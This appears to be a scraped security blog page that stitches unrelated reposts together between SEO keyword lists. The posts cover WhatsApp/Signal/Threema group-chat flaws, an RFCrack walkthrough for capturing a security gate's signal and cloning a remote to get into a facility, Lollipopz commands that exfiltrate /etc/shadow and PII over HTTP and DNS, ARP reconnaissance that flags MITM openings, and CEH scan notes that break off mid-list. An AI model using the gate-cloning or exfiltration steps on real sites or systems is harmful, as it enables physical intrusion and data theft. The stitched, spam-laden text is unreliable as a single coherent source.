Insecurities Of WhatsApp's, Signal's, And Threema's Group Chats

Recently, the theoretical and practical analysis of secure instant messenger protocols received much attention, but the focus of prior evaluations mostly lay in one-to-one communication. In this blog post we want to presents the results of our work that focuses on group chat protocols of three major instant messenger applications; namely Signal, WhatsApp, and Threema.

In this blog post, we aim to focus on the practical impact and the found weaknesses identified by our analysis. The interested reader may also look into our paper for more details.

Our Aim and What We Were Looking For

End-to-end encryption protects the confidentiality of communication that is forwarded via central servers to the designated receivers. As a consequence, neither parties on the network route of the messages, nor the provider of the central server (e.g. the WhatsApp server) should be able to read any information out of the observation of the communication. In particular, no other user of the application should have access to the communication. Further it might be desirable to require that also the messages' integrity is end-to-end protected and that a sender is informed about the delivery state of sent messages.

Delivery state information in Signal (upper screenshot) and WhatsApp (lower screenshot)

In a two party scenario, this analysis is rather fixed to two components of the protocol: the key establishment between both parties and the communication channel protection using the established key (mostly consisting of an encryption algorithm and a scheme for providing integrity like MACs or signature schemes).

Regarded attackers

In a group setting, the same attackers apply (network, provider, other users). However the requirements for secure communication differ. It is further necessary that only group members can write to and read content from the group. Additionally, only administrators of the group are able to add new members.

In addition to these standard requirements, we also evaluated the protocols' security guarantees if the client's secrets were revealed (forward secrecy and future secrecy).

Our Approach

We analyzed the mentioned protocols by reading the source code and debugging the apps. We also used alternative open source implementations of Threema and WhatsApp as a help and we traced the network traffic. When using alternative implementations, we only took incoming traffic into account, which was generated by official applications. Thereby we extracted the protocol descriptions and evaluated them regarding the defined requirements.

Our Findings

In WhatsApp and Threema, the provider was able to manipulate the set of members. Threema only allowed the provider to rewind the set of members to a previous state. As a consequence previously removed members could have been added to the group again. The WhatsApp provider is able to arbitrarily manipulate the member set. Thereby further members and administrators can be added to the group. Since the authenticity of group manipulation is not protected, the WhatsApp provider can set the real group administrator as the source of manipulation even though this administrator was not active.

Since Signal's key exchange protocol provides future secrecy, we also evaluated the protocol's ability to recover into a secure group state after a member's state was compromised. The essential weakness here is that a sender only needs to know the static group ID to send a message to the group. If a group member receives a message with the correct group ID, no verification regarding the current member set takes place but the message is directly added to the group communication. Consequently it is sufficient to retrieve the group ID in order to send messages to the group. Since Signal treats content messages the same way as messages for the manipulation of the group set, an attacker who knows the group ID can add herself to the group and thereby read the subsequent group communication.

In addition to this, in all cases the delivery state of sent messages was not securely provided. Threema's group chats do not inform the sender about the delivery state while Signal and WhatsApp do not protect the delivery information on the end-to-end layer. Therefore the central provider can forge this information and drop messages without letting the communicating parties detect this.

Also the order of messages was manipulable for the providers of the applications such that the provider is able to deliver the messages in a different order than they were sent. Threema's weakness of rewinding a group state results from missing replay attack protection.

Impact of Weaknesses

Even though end-to-end encryption is implemented in all analyzed applications, the central providers can largely manipulate the communication in groups and partially also read it.
In all applications, the provider can undetectably drop and reorder messages during the delivery and thereby manipulate the view of the communication such that further attacks can be obfuscated.
The central servers of WhatsApp can be used to add arbitrary users to groups and thereby receive their communication.
To achieve the same result for Signal, it suffices to retrieve the group ID. An earlier member who left the group once still knows this ID since it is static. However, in contrast to WhatsApp, the origin of the manipulation is correctly displayed in the Signal application (which was not the fact when we started our analysis).

As a result, the end-to-end protection of WhatsApp is not sufficient to reach confidentiality in groups. For Signal no future secrecy is reached in groups and Threema was vulnerable to replay attacks which resulted in further weaknesses.

Responsible Disclosure

We disclosed our findings to the developers and received varying response. Threema updated their protocol in version 3.14 such that our attacks are not feasible anymore. Moxie Marlinspike responded that Signal is "working on an entirely new group mechanism that we should be deploying soon". WhatsApp did not hold out the prospect of fixing the described vulnerabilities (Update 01/18: According to Facebook's Security Head, the invite links make a fix more difficult [1]; we proposed a way to solve this issue [2]).

[1] https://twitter.com/alexstamos/status/951169036947107840
[2] https://web-in-security.blogspot.de/2018/01/group-instant-messaging-why-baming.html

More information

1. Hack Rom Tools
2. Ethical Hacker Tools
3. Hak5 Tools
4. Hacker Tools Free
5. Underground Hacker Sites
6. Game Hacking
7. Hack Tools For Ubuntu
8. New Hacker Tools
9. Physical Pentest Tools
10. Physical Pentest Tools
11. What Are Hacking Tools
12. Hack Tools Pc
13. Pentest Box Tools Download
14. Hack Tools Online
15. Tools 4 Hack
16. World No 1 Hacker Software
17. Hacker Tools For Mac
18. Pentest Tools Open Source
19. Hacking Tools Pc
20. Hacker Tools For Mac
21. Hacking Tools Name
22. Best Pentesting Tools 2018
23. Hack App
24. Free Pentest Tools For Windows
25. Hacker Tools Apk Download

Hacking Everything With RF And Software Defined Radio - Part 3

Reversing Device Signals with RFCrack for Red Teaming

This blog was researched and automated by:
@Ficti0n 

@GarrGhar 
Mostly because someone didn't want to pay for a new clicker that was lost LOL

Websites:
Console Cowboys: http://consolecowboys.com 
CC Labs: http://cclabs.io

CC Labs Github for RFCrack Code:
https://github.com/cclabsInc/RFCrack

Contrived Scenario: 

Bob was tasked to break into XYZ  corporation, so he pulled up the facility on google maps to see what the layout was. He was looking for any possible entry paths into the company headquarters. Online maps showed that the whole facility was surrounded by a security access gate. Not much else could be determined remotely so bob decided to take a drive to the facility and get a closer look. 

Bob parked down the street in view of the entry gate. Upon arrival he noted the gate was un-manned and cars were rolling up to the gate typing in an access code or simply driving up to the gate as it opening automatically.  Interestingly there was some kind of wireless technology in use. 

How do we go from watching a car go through a gate, to having a physical device that opens the gate?  

We will take a look at reversing a signal from an actual gate to program a remote with the proper RF signal.  Learning how to perform these steps manually to get a better understanding of how RF remotes work in conjunction with automating processes with RFCrack. 

Items used in this blog: 

Garage Remote Clicker: https://goo.gl/7fDQ2N
YardStick One: https://goo.gl/wd88sr
RTL SDR: https://goo.gl/B5uUAR

 

Walkthrough Video: 

Remotely sniffing signals for later analysis: 

In the the previous blogs, we sniffed signals and replayed them to perform actions. In this blog we are going to take a look at a signal and reverse it to create a physical device that will act as a replacement for the original device. Depending on the scenario this may be a better approach if you plan to enter the facility off hours when there is no signal to capture or you don't want to look suspicious. 

Recon:

Lets first use the scanning functionality in RFCrack to find known frequencies. We need to understand the frequencies that gates usually use. This way we can set our scanner to a limited number of frequencies to rotate through. The smaller rage of frequencies used will provide a better chance of capturing a signal when a car opens the target gate. This would be beneficial if the scanning device is left unattended within a dropbox created with something like a Kali on a Raspberry Pi. One could access it from a good distance away by setting up a wifi hotspot or cellular connection.

Based on research remotes tend to use 315Mhz, 390Mhz, 433Mhz and a few other frequencies. So in our case we will start up RFCrack on those likely used frequencies and just let it run. We can also look up the FCID of our clicker to see what Frequencies manufactures are using. Although not standardized, similar technologies tend to use similar configurations. Below is from the data sheet located at https://fccid.io/HBW7922/Test-Report/test-report-1755584 which indicates that if this gate is compatible with a universal remote it should be using the 300,310, 315, 372, 390 Frequencies. Most notably the 310, 315 and 390 as the others are only on a couple configurations. 

RFCrack Scanning: 

Since the most used ranges are 310, 315, 390 within our universal clicker, lets set RFCrack scanner to rotate through those and scan for signals.  If a number of cars go through the gate and there are no captures we can adjust the scanner later over our wifi connection from a distance. 

Destroy:RFCrack ficti0n$ python RFCrack.py -k -f 310000000 315000000 390000000

Currently Scanning: 310000000 To cancel hit enter and wait a few seconds

Currently Scanning: 315000000 To cancel hit enter and wait a few seconds

Currently Scanning: 390000000 To cancel hit enter and wait a few seconds

e0000000000104007ffe0000003000001f0fffe0fffc01ff803ff007fe0fffc1fff83fff07ffe0007c00000000000000000000000000000000000000000000e0007f037fe007fc00ff801ff07ffe0fffe1fffc3fff0001f00000000000000000000000000000000000000000000003809f641fff801ff003fe00ffc1fff83fff07ffe0fffc000f80000000000000000000000000000000000000000000003c0bff01bdf003fe007fc00ff83fff07ffe0fffc1fff8001f0000000000000000000000000000000000000000000000380000000000000000002007ac115001fff07ffe0fffc000f8000000000000000000000000000000000000000

Currently Scanning: 433000000 To cancel hit enter and wait a few seconds

Example of logging output: 

From the above output you will see that a frequency was found on 390. However, if you had left this running for a few hours you could easily see all of the output in the log file located in your RFCrack/scanning_logs directory.  For example the following captures were found in the log file in an easily parseable format: 

Destroy:RFCrack ficti0n$ cd scanning_logs/

Destroy:scanning_logs ficti0n$ ls

Dec25_14:58:45.log Dec25_21:17:14.log Jan03_20:12:56.log

Destroy:scanning_logs ficti0n$ cat Dec25_21\:17\:14.log

A signal was found on :390000000

c0000000000000000000000000008000000000000ef801fe003fe0fffc1fff83fff07ffe0007c0000000000000000000000000000000000000000000001c0000000000000000050003fe0fbfc1fffc3fff83fff0003e00000000000000000000000000000000000000000000007c1fff83fff003fe007fc00ff83fff07ffe0fffc1fff8001f00000000000000000000000000000000000000000000003e0fffc1fff801ff003fe007fc1fff83fff07ffe0fffc000f80000000000000000000000000000000000000000000001f07ffe0dffc00ff803ff007fe0fffc1fff83fff07ffe0007c000000000000000000000000000000000000000000

A signal was found on :390000000

e0000000000104007ffe0000003000001f0fffe0fffc01ff803ff007fe0fffc1fff83fff07ffe0007c00000000000000000000000000000000000000000000e0007f037fe007fc00ff801ff07ffe0fffe1fffc3fff0001f00000000000000000000000000000000000000000000003809f641fff801ff003fe00ffc1fff83fff07ffe0fffc000f80000000000000000000000000000000000000000000003c0bff01bdf003fe007fc00ff83fff07ffe0fffc1fff8001f0000000000000000000000000000000000000000000000380000000000000000002007ac115001fff07ffe0fffc000f8000000000000000000000000000000000000000

Analyzing the signal to determine toggle switches: 

Ok sweet, now we have a valid signal which will open the gate. Of course we could just replay this and open the gate, but we are going to create a physical device we can pass along to whoever needs entry regardless if they understand RF. No need to fumble around with a computer and look suspicious.  Also replaying a signal with RFCrack is just to easy, nothing new to learn taking the easy route. 

The first thing we are going to do is graph the capture and take a look at the wave pattern it creates. This can give us a lot of clues that might prove beneficial in figuring out the toggle switch pattern found in remotes. There are a few ways we can do this. If you don't have a yardstick at home you can capture the initial signal with your cheap RTL-SDR dongle as we did in the first RF blog. We could then open it in audacity. This signal is shown below. 

Let RFCrack Plot the Signal For you: 

The other option is let RFCrack help you out by taking a signal from the log output above and let RFCrack plot it for you.  This saves time and allows you to use only one piece of hardware for all of the work.  This can easily be done with the following command: 

Destroy:RFCrack ficti0n$ python RFCrack.py -n -g -u 1f0fffe0fffc01ff803ff007fe0fffc1fff83fff07ffe0007c

-n = No yardstick attached

-g = graph a single signal

-u = Use this piece of data

From the graph output we see 2 distinct crest lengths and some junk at either end we can throw away. These 2 unique crests correspond to our toggle switch positions of up/down giving us the following 2 possible scenarios using a 9 toggle switch remote based on the 9 crests above: 

Possible toggle switch scenarios:

1. down down up up up down down down down
2. up up down down down up up up up 

Configuring a remote: 

Proper toggle switch configuration allows us to program a universal remote that sends a signal to the gate. However even with the proper toggle switch configuration the remote has many different signals it sends based on the manufacturer or type of signal.  In order to figure out which configuration the gate is using without physically watching the gate open, we will rely on local signal analysis/comparison.  

Programming a remote is done by clicking the device with the proper toggle switch configuration until the gate opens and the correct manufacturer is configured. Since we don't have access to the gate after capturing the initial signal we will instead compare each signal from he remote to the original captured signal. 

Comparing Signals: 

This can be done a few ways, one way is to use an RTLSDR and capture all of the presses followed by visually comparing the output in audacity. Instead I prefer to use one tool and automate this process with RFCrack so that on each click of the device we can compare a signal with the original capture. Since there are multiple signals sent with each click it will analyze all of them and provide a percent likelihood of match of all the signals in that click followed by a comparing the highest % match graph for visual confirmation. If you are seeing a 80-90% match you should have the correct signal match.  

Note:  Not every click will show output as some clicks will be on different frequencies, these don't matter since our recon confirmed the gate is communicating on 390Mhz. 

In order to analyze the signals in real time you will need to open up your clicker and set the proper toggle switch settings followed by setting up a sniffer and live analysis with RFCrack: 

Open up 2 terminals and use the following commands: 

#Setup a sniffer on 390mhz
  Setup sniffer:      python RFCrack.py -k -c -f 390000000.     

#Monitor the log file, and provide the gates original signal
  Setup Analysis:     python RFCrack.py -c -u 1f0fffe0fffc01ff803ff007fe0fffc1fff83fff07ffe0007c -n.  

Cmd switches used

-k = known frequency

-c = compare mode

-f = frequency

-n = no yardstick needed for analysis

Make sure your remote is configured for one of the possible toggle configurations determined above. In the below example I am using the first configuration, any extra toggles left in the down position: (down down up up up down down down down)

Analyze Your Clicks: 

Now with the two terminals open and running click the reset switch to the bottom left and hold till it flashes. Then keep clicking the left button and viewing the output in the sniffing analysis terminal which will provide the comparisons as graphs are loaded to validate the output.  If you click the device and no output is seen, all that means is that the device is communicating on a frequency which we are not listening on.  We don't care about those signals since they don't pertain to our target. 

At around the 11th click you will see high likelihood of a match and a graph which is near identical. A few click outputs are shown below with the graph from the last output with a 97% match.  It will always graph the highest percentage within a click.  Sometimes there will be blank graphs when the data is wacky and doesn't work so well. This is fine since we don't care about wacky data. 

You will notice the previous clicks did not show even close to a match, so its pretty easy to determine which is the right manufacture and setup for your target gate. Now just click the right hand button on the remote and it should be configured with the gates setup even though you are in another location setting up for your test. 

For Visual of the last signal comparison go to ./imageOutput/LiveComparison.png

----------Start Signals In Press--------------

Percent Chance of Match for press is: 0.05

Percent Chance of Match for press is: 0.14

Percent Chance of Match for press is: 0.14

Percent Chance of Match for press is: 0.12

----------End Signals In Press------------

For Visual of the last signal comparison go to ./imageOutput/LiveComparison.png

----------Start Signals In Press--------------

Percent Chance of Match for press is: 0.14

Percent Chance of Match for press is: 0.20

Percent Chance of Match for press is: 0.19

Percent Chance of Match for press is: 0.25

----------End Signals In Press------------

For Visual of the last signal comparison go to ./imageOutput/LiveComparison.png

----------Start Signals In Press--------------

Percent Chance of Match for press is: 0.93

Percent Chance of Match for press is: 0.93

Percent Chance of Match for press is: 0.97

Percent Chance of Match for press is: 0.90

Percent Chance of Match for press is: 0.88

Percent Chance of Match for press is: 0.44

----------End Signals In Press------------

For Visual of the last signal comparison go to ./imageOutput/LiveComparison.png

Graph Comparison Output for 97% Match: 

Conclusion: 

You have now walked through successfully reversing a toggle switch remote for a security gate. You took a raw signal and created a working device using only a Yardstick and RFCrack.  This was just a quick tutorial on leveraging the skillsets you gained in previous blogs in order to learn how to analyze  RF signals within embedded devices. There are many scenarios these same techniques could assist in.  We also covered a few new features in RF crack regarding logging, graphing and comparing signals.  These are just a few of the features which have been added since the initial release. For more info and other features check the wiki. 

Related links

1. Growth Hacker Tools
2. Hacking Tools For Windows Free Download
3. Pentest Tools Subdomain
4. Nsa Hacker Tools
5. Hacker Tools Hardware
6. Tools For Hacker
7. Nsa Hack Tools Download
8. Pentest Automation Tools
9. Hack Tools For Games
10. Pentest Tools Open Source
11. Hacking Tools Windows
12. Hacker Tool Kit
13. Tools Used For Hacking
14. Pentest Tools Bluekeep
15. Physical Pentest Tools

Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server

# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server

# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server

$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client

# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server

# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r

Download Lollipopz

via KitPloit

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related word

• Hacking Tools Windows 10
• Pentest Tools Linux
• Hacking Tools Pc
• Nsa Hacker Tools
• What Are Hacking Tools
• Hacking Tools Download
• Pentest Tools Windows
• Hack Tools For Mac
• Pentest Automation Tools
• Beginner Hacker Tools
• What Are Hacking Tools
• Hack Tool Apk
• How To Install Pentest Tools In Ubuntu
• Hacking Tools Pc
• Hacking Tools For Pc
• Hacker Tools List
• New Hacker Tools
• Hack Tools Download
• Top Pentest Tools
• Computer Hacker
• Github Hacking Tools
• Game Hacking
• Hacker Search Tools
• Hack Apps
• Pentest Tools Apk
• Hacker
• Hackrf Tools

Audix - A PowerShell Tool To Quickly Configure The Windows Event Audit Policies For Security Monitoring

Audix will allow for the SIMPLE configuration of Windows Event Audit Policies. Window's Audit Policies are restricted by default. This means that for Incident Responders, Blue Teamers, CISO's & people looking to monitor their environment through use of Windows Event Logs, must configure the audit policy settings to provide more advanced logging.
This utility, aims to capture the current audit policy setting, perform a backup of it (incase a restore to previous state is required) and apply a more advanced Audit Policy setting to allow for better detection capability. In addition, it will enforce audit policy subcategories to ensure that these advance setting persist. There is also a setting to adjust the logging size limit.
Some examples of enabled policy settings that Audix will enable:
-Event ID: 4698-4702 (A scheduled task was created/updated/disabled)
-Event ID: 4688 (A new process has been created.)

Running Audix
Git Clone the repo

git clone https://github.com/littl3field/Audix.git

Navigate to the folder and execute the command in your terminal. You must ensure you have Administrator rights to do this.

.\Audix.ps1

Development

• I will be adding these settings as a priority:
  • Increase logging size limit (DONE)
  • Enforce audit policy subcategory setting (DONE)
• Add restore option
• GPO Setting Configuration

Please note: This tool will only change the local security policy. If applied to a host with a GPO setting, it is best to use the same settings in a Group Policy default profile so all systems get the same config. If the GPO profile is not changed to meet these settings, a GPO force will override it.

Download Audix

via KitPloit

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related news

1. Hack Tools Mac
2. Hacking Tools Github
3. Hacking Tools Name
4. Hacker Tools List
5. Hacker Tools Free Download
6. Pentest Box Tools Download
7. Hacking Tools Software
8. Hack Tools Download
9. Pentest Tools Kali Linux
10. Pentest Tools
11. Pentest Automation Tools
12. Pentest Tools Website
13. Pentest Recon Tools
14. How To Install Pentest Tools In Ubuntu
15. Free Pentest Tools For Windows
16. Hak5 Tools
17. Termux Hacking Tools 2019

How To Switch From 32-Bit Windows 10 To 64-Bit Windows 10

Microsoft offers Windows 10 as a free upgrade for computers running a genuine copy of Windows 7 or Windows 8.1. Also, similar to previous releases, the operating system is available on different editions and two versions: 32-bit and 64-bit.While upgrading from Windows 10 Home to Windows 10 Pro is not free, what many people are unfamiliar with is that Microsoft won't ask for more money to upgrade from a 32-bit to a 64-bit version.

However, the upgrade path only allows moving from a qualifying version to its equivalent edition on the same architecture. This limit means that if your PC is running a 32-bit version of Windows 8.1, after the upgrade you'll be stuck with the 32-bit version of Windows 10 — even if your computer's processor can handle the 64-bit version. The only solution is to make a clean installation of the operating system and reconfigure all your apps and settings.

In this Windows 10 guide, we'll walk you through the steps to verify whether your computer in fact includes support for a 64-bit version and we'll guide you through the upgrade process to Windows 10 (x64).

Make sure Windows 10 64-bit is compatible with your PC

A 64-bit version of Windows can only be installed on computers with capable hardware. As such, the first thing you need to do is to determine whether your computer has a 64-bit processor.

You can easily get this information from the Settings app.

1. Use the Windows key + I keyboard shortcut to open the Settings app.
2. Click System.
3. Click About.
4. Under System type, you will see two pieces of information: if it says 32-bit operating system, x64-based processor, then it means that your PC is running a 32-bit version of Windows 10 on a 64-bit processor. If it says 32-bit operating system, x86-based processor, then your computer doesn't support Windows 10 (64-bit).

Make Sure Your Processor is 64-bit Capable

First thing's first. Before even thinking of upgrading to 64-bit Windows, you'll need to confirm that the CPU in your computer is 64-bit capable. To do so, head to Settings > System > About. On the right-hand side of the window, look for the "System type" entry.

You'll see one of three things here:

• 64-bit operating system, x64-based processor. Your CPU does support 64-bit and you already have the 64-bit version of Windows installed.
• 32-bit operating system, x86-based processor. Your CPU does not support 64-bit and you have the 32-bit version of Windows installed.
• 32-bit operating system, x64-based processor. Your CPU supports 64-bit, but you have the 32-bit version of Windows installed.

If you see the first entry on your system, you don't really need this article. If you see the second entry, you won't be able to install the 64-bit version of Windows on your system at all. But if you see the last entry on your system—"32-bit operating system, x64-based processor"—then you're in luck. This means you're using a 32-bit version of Windows 10 but your CPU can run a 64-bit version, so if you see it, it's time to move on to the next section.
Make Sure Your PC's Hardware Has 64-bit Drivers Available

Even if your processor is 64-bit compatible, you might want to consider whether your computer's hardware will work properly with a 64-bit version of Windows. 64-bit versions of Windows require 64-bit hardware drivers, and the 32-bit versions you're using on your current Windows 10 system won't work.

Modern hardware should certainly offer 64-bit drivers, but very old hardware may no longer be supported and the manufacturer may have never offered 64-bit drivers. To check for this, you can visit the manufacturer's driver download web pages for your hardware and see if 64-bit drivers are available. You shouldn't necessarily need to download these from the manufacturer's website, though. They are likely included with Windows 10 or automatically will be downloaded from Windows Update. But old hardware—for example, a particularly ancient printer—simply may not offer 64-bit drivers.

Upgrade by Performing a Clean Install

You'll need to perform a clean install to get to the 64-bit version of Windows 10 from the 32-bit one. Unfortunately, there's no direct upgrade path.

Warning: Back up your important files before continuing and also make sure you have what you need to reinstall your programs. This process will wipe your whole hard disk, including Windows, installed programs, and personal files.

First, if you haven't upgraded to Windows 10 yet, you'll need to use the upgrade tool to upgrade. You'll get the 32-bit version of Windows 10 if you were previously using a 32-bit version of Windows 7 or 8.1. But the upgrade process will give your PC a Windows 10 license. After upgrading, be sure to check that your current 32-bit version of Windows 10 is activated under Settings > Update & security > Activation.

Once you're using an activated version of the 32-bit Windows 10, download the Windows 10 media creation tool from Microsoft. If you're using the 32-bit version of Windows 10 at the moment, you'll have to download and run the 32-bit tool.

When you run the tool, select "Create installation media for another PC" and use the tool to create a USB drive or burn a disc with Windows 10. As you click through the wizard, you'll be asked whether you want to create 32-bit or 64-bit installation media. Select the "64-bit (x64)" architecture.

Next, restart your computer (you did back everything up, right?) and boot from the installation media. Install the 64-bit Windows 10, selecting "Custom install" and overwriting your current version of Windows. When you're asked to insert a product key, skip the process and continue. You'll have to skip two of these prompts in total. After you reach the desktop, Windows 10 will automatically check in with Microsoft and activate itself. You'll now be running the 64-bit edition of Windows on your PC.

If you want to go back to the 32-bit version of Windows, you'll need to download the media creation tool—the 64-bit version, if you're running the 64-bit version of Windows 10—and use it to create 32-bit installation media. Boot from that installation media and do another clean install—this time installing the 32-bit version over the 64-bit version.

Final Words :

Finally, you are aware of the way through which you could be able to switch from the 32-bit windows to 64-bit windows really easily. There will be no difference in the functions or the working of the windows yet the only change that you will get is the more advanced architecture that is compatible with numerous high-end apps. If you are thinking to switch your windows to the 64-bit version then make sure you first check for your hardware compatibility. Hopefully, you would have liked the information of this post, please share this post with others if you really liked it. Provide us your valuable views regarding this post through using the comments section below. At last nevertheless thanks for reading this post!

Related news

1. Nsa Hack Tools
2. Pentest Tools
3. Hack Apps
4. Hack Tools Mac
5. Hacking Tools And Software
6. Pentest Tools Kali Linux
7. Hacking Tools For Windows Free Download
8. Hacker Tools List
9. Hack Tools Pc
10. Hacker Techniques Tools And Incident Handling
11. Hacker Tools Apk Download
12. Pentest Tools
13. Pentest Tools Online
14. Wifi Hacker Tools For Windows
15. Hack Tools 2019

Eavesarp - Analyze ARP Requests To Identify Intercommunicating Hosts And Stale Network Address Configurations (SNACs)

A reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution.

Requirements/Installation
This is only gon' work on Kali or other Debian-based Linux distributions
eavesarp requires Python3.7 and Scapy. After installing Python, run the following to install Scapy: python3.7 -m pip install -r requirements.txt

General Usage

Capturing ARP Requests
Notes:

• eavesarp requires root privileges to sniff from the interface and craft ARP packets.
• Captured output is automatically written to disk under the name eavesarp.db to prevent having to recapture ARP requests.

Passive Execution
The most basic form of execution is:

sudo ./eavesarp.py capture -i eth1

This will initialize eavesarp such that ARP requests will be captured, analyzed, and relevant output will be presented to the user in a table. Use --help for additional information on non-standard arguments. Note that the stale column indicates [UNCONFIRMED] when an ARP request originating from a target (as a sender) has not yet been observed when running in this mode. Enable ARP resolution via the -ar flag to determine if a given target address has gone stale.

 ___ ___ __  _____ ___ ___ ________
/ -_) _ `/ |/ / -_|_-</ _ `/ __/ _ \
\__/\_,_/|___/\__/___/\_,_/_/ / .__/
-----------------------------/ /---
[LISTEN CAREFULLY]          /_/

Capture interface: eth1
ARP resolution:    disabled
DNS resolution:    disabled
Requests analyzed: 65

SNAC    Sender         Target            ARP#  Stale
------  -------------  --------------  ------  -------------
        192.168.86.5   192.168.86.101      29  [UNCONFIRMED]
                       192.168.86.3         1
        192.168.86.3   192.168.86.37       25  [UNCONFIRMED]
                       192.168.86.38        7  [UNCONFIRMED]
                       192.168.86.5         1
                       192.168.86.99        1
        192.168.86.99  192.168.86.3         1

Active Execution (ARP Resolution, DNS Resolution)
Enable ARP and DNS resolution by including the -ar and -dr flags. Keep in mind that this makes the tool non-passive, but the advantage is that DNS records, MAC addresses, and a confirmation of SNACs status is returned.

sudo ./eavesarp.py capture -i eth1 -ar -dr --blacklist 192.168.86.5

We can clearly see from the output below which senders are affected by one or more SNACs and the affected addresses. The final column indicates if a potential MITM opportunity is present. eavesarp checks to see if the FWD address of the PTR resolved for a given sender is different. If so, it may be an indicator that the intended target has moved to the new FWD address. Applying an alias to the interface of our attacking host may allow us to forward the traffic to the intended target and capture information in transit.

 ___ ___ __  _____ ___ ___ ________
/ -_) _ `/ |/ / -_|_-</ _ `/ __/ _ \
\__/\_,_/|___/\__/___/\_,_/_/ / .__/
-----------------------------/ /---
[LISTEN CAREFULLY]          /_/

Capture interface: eth1
ARP resolution:    enabled
DNS resolution:    enabled
Requests analyzed: 55

SNAC    Sender         Target            ARP#  Stale    Sender PTR      Target PTR        MITM
------  -------------  --------------  ------  -------  --------------  ----------------  ---------------------------------------------
True    192.168.86.2   192.168.86.101      21  True     iron.aa.local.  syslog.aa.local.  T-IP:192.168.86.101 != PTR-FWD:192.168.86.102
True    192.168.86.3   192.168.86.38       17  True     crux.aa.local.
                       192.168.86.37       15  True
                       192.168.86.99        1                           w10.aa.local.
        192.168.86.99  192.168.86.3         1           w10.   aa.local.   crux.aa.local.

Analyzing PCAP Files and SQLite Databases (generated by eavesarp)
eavesarp can accept SQLite databases and PCAP files for analysis. It will output the extracted values to a new database file for further analysis. See the --help flag for more information on this process, however basic execution is demonstrated below.

sudo ./eavesarp.py analyze -sfs eavesarp.db  -cp disable --blacklist 192.168.86.5 --csv-output-file eavesarp_analysis.db

SNAC    Sender         Target            ARP#  Stale    Sender PTR      Target PTR        MITM
------  -------------  --------------  ------  -------  --------------  ----------------  ---------------------------------------------
True    192.168.86.2   192.168.86.101      21  True     iron.aa.local.  syslog.aa.local.  T-IP:192.168.86.101 != PTR-FWD:192.168.86.102
True    192.168.86.3   192.168.86.38       17  True     crux.aa.local.
                       192.168.86.37       15  True
                       192.168.86.99        1                           w10.aa.local.
        192.168.86.99  192.168.86.3         1           w10.aa.local.   crux.aa.local.
- Writing csv output to eavesarp_analysis.db

...and the CSV output looks like...

arp_count,sender,sender_mac,target,target_mac,stale,sender_ptr,target_ptr,target_forward,mitm_op,snac
21,192.168.86.2,74:d4:35:1a:b5:fb,192.168.86.101,[STALE TARGET],True,iron.aa.local.,syslog.aa.local.,192.168.86.102,T-IP:192.168.86.101 != PTR-FWD:192.168.86.102,True
17,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.38,[STALE TARGET],True,crux.aa.local.,,,False,True
15,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.37,[STALE TARGET],True,crux.aa.local.,,,False,True
1,192.168.86.99,08:00:27:22:49:c5,192.168.86.3,b8:27:eb:a9:5c:8f,False,w10.aa.local.,crux.aa.local.,192.168.86.3,False,False
1,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.99,08:00:27:22:49:c5,False,crux.aa.local.,w10.aa.local.,192.168.86.99,False,True

Download Eavesarp

via KitPloit

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Read more

• Hacking Tools For Kali Linux
• Blackhat Hacker Tools
• Hack Tools Pc
• Github Hacking Tools
• Pentest Tools Online
• Hack Tools For Games
• Hacker Tools Windows
• Pentest Tools Android
• Best Pentesting Tools 2018
• Hacker Tools For Windows
• Hacking Tools Usb
• Computer Hacker
• Hacker Tools For Ios
• Bluetooth Hacking Tools Kali
• Pentest Tools Tcp Port Scanner
• Hacking Tools Github
• Hacker Tools Free
• What Is Hacking Tools
• Hack Tools 2019

CEH: Gathering Network And Host Information, Types Of Scan

In Hacking the main focus is over gathering the information about victim or victim's machine. Which will help to find out which type of exploit will works according to the given circumstances. Gathering the network and host information means to find out by which network, the which victim's machine is connected and communicating over the network. Moreover, scanning is also performed for gathering information about open and closed ports. After that they'll able to find the vulnerabilities in the target system and try to get access to the system.

Types Of Scan

As a CEH you should know the scan types and uses:

SYN

SYN scan doesn't complete the TCP three way handshake that is why it is known as a half-open scan. An attacker send a SYN packet to the victim machine if SYN/ACK packet is received back to attacker, then it clarify that the port is listening due to the acknowledgment by the victim that it has completed the connection. While if the attacker is received the RST/ACK packet then it assumed that the port is closed or open.

XMAS

XMAS scan works only on target system that has the RFC 793 development of TCP/IP and it doesn't works against any version of windows.
XMAS scan send a packet with by setting up the FIN, URG and PSH flags of the TCP header. The function of this scan is if the port is active there will be no response but if the port is closed the target responds with a RST/ACK packet.

FIN

A FIN scan send a packet by setting up only the FIN flag of the TCP. This scan is similar to XMAS scan. FIN scan receives no response if the port is active while if the port is closed it receives the RST/ACK packet.

NULL 

NULL scan is also similar to the XMAS scan. But the only difference is that it sends a packet without setting up the any flag of TCP header. NULL scan receives no response if the port is open but if the port is closed it receives the RST/ACK packet.

IDLE

